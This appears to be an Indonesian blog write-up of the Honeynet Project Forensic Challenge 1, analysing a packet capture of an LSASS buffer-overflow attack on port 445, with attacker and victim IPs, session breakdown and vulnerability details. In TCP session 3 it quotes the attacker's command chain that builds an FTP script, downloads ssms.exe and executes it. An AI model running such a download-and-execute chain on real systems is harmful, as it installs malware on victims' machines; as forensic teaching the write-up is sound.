Analisis Forensik Cyber Crime [The Honeynet Project Forensic Challenge 1] bagian1

Based on solution of honeynet forensic challenge paper

Diketahui

Terdapat sebuah rekam jejak jaringan yang didalamnya terdapat informasi mengenai percobaan serangan terhadap sistem lokal

attack-trace.pcap_.gz

Ditanya

Analisis data paket jaringan dan informasi berkaitan dengan point-point berikut:

  1. Sistem (IP dsb) yang terlibat
  2. Informasi mengenai penyerang
  3. TCP sessions yang terbentuk
  4. Waktu penyerangan
  5. Apa yang diserang
  6. Apa saja yang dilakukan penyerang
  7. Vulnerability yang diserang
  8. Perintah (shellcode) yang dilakukan penyerang
  9. Apakah korban merupakan honeypot?
  10. Malware yang terlibat
  11. Jenis serangan, manual atau otomatis

Jawab

1. Sistem (IP dsb) yang terlibat

Tools: Wireshark

Terlihat dari informasi conversation, IP penyerang adalah 98.114.205.102 dan IP korban 192.150.11.111

klik untuk gambar ukuran penuh



2. Informasi mengenai penyerang

Tools: http://www.hostip.info, http://www.who.is

Informasi penting mengenai penyerang antara lain:

lokasi host: Southampton, New York, United States

berada di range IP Verizon.net

klik untuk gambar ukuran penuh

klik untuk perbesar gambar



3. TCP Sessions yang terbentuk

Terdapat 5 TCP session yang terbentuk

klik untuk perbesar gambar



4. Waktu penyerangan

Tools: Wireshark

Penyerangan berlangsung selama 16 detik, pada 20 April 2010 pukul 10:10:28 sampai 10:10:44 waktu sistem lokal

klik untuk memperbesar gambar



5. Apa yang diserang

Tools: Wireshark, mbah google

Pada TCP session pertama terdapat indikasi percobaan terhadap port scan terhadap port 445

klik untuk perbesar gambar

black list port 445, ditemukan percobaan buffer overflowing pada fungsi DsRoleUpgradeDownlevelServer() oleh penyerang,

klik untuk perbesar gambar

yup, ternyata merupakan exploit buffer overflow, terdaftar di http://www.securityfocus.com/archive/1/360210

klik untuk perbesar gambar

Ringkasan:

Nama exploit: Windows Local Security Authority Service Remote Buffer Overflow

Vulnerability: Windows LSA (Local Security Authority) Service (LSASRV.DLL) via LSARPC named pipe TCP port 139 and 445.

Suspect: Windows 2000, XP

Hasil yang ditimbulkan Exploit: Remote Code Execution

6. Apa saja yang dilakukan penyerang

Ringkas:

Penyerang melakukan percobaan buffer overflowing pada vulnerability fungsi DsRoleUpgradeDownlevelServer(), Windows LSA (Local Security Authority) Service (LSASRV.DLL) melalui port 445, ternyata berhasil. Penyerang memberi perintah remote pada korban untuk mendownload malware ssms.exe dan mengeksekusinya. Game over….

Detail:

Agar lebih enak penjabarannya aktivitas penyerang akan dibreakdown berdasarkan TCP session

TCP session 1

Penyerang melakukan percobaan port scan terhadap port 445

klik untuk perbesar gambar

TCP session 2

Penyerang melakukan buffer overflowing terhadap fungsi DsRoleUpgradeDownlevelServer() pada Windows LSA (Local Security Authority) Service (LSASRV.DLL) di port 445 menghasilkan bindshell di port 1957 yang akan digunakan penyerang untuk aktivitas selanjutnya

klik untuk perbesar gambar

TCP session 3

Penyerang mengeksekusi perintah echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe; ssms.exe, memberi perintah remote pada korban untuk mendowload malware ssms.exe dan mengeksekusinya

klik untuk perbesar gambar

TCP session 4

Korban membuka koneksi ftp untuk mendownload ssms.exe

klik untuk perbesar gambar

TCP session 5

Proses download smss.exe berlangsung sampai selesai, dan dieksekusi di komputer korban. Game over…

klik untuk perbesar gambar



7. Vulnerability yang diserang

seperti yang dijelaskan pada jawaban point 5

Nama exploit: Windows Local Security Authority Service Remote Buffer Overflow http://www.securityfocus.com/archive/1/360210

Vulnerability: Windows LSA (Local Security Authority) Service (LSASRV.DLL) via LSARPC named pipe TCP port 139 and 445.

Suspect: Windows 2000, XP

Hasil yang ditimbulkan Exploit: Remote Code Execution

Bersambung…. (rehat dulu, soal no.8 udah maen2 di disassembler.. pusing2 dah -.-a)

3 thoughts on “Analisis Forensik Cyber Crime [The Honeynet Project Forensic Challenge 1] bagian1

  1. Apa anda yakin dapat benar2x malacak si penyerang???
    Pasalnya jika sang penyerang menggunakan server umum sebagai host zombie, maka jejaknya akan sama sekali tertutupi!!!

    • Host zombie sampai saat ini masih merupakan salah satu problem serius dalam penanganan cyber crime. Dukungan law enforcement akan sangat critical untuk pengungkapan kasus penyerangan yang menggunakan host zombie.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s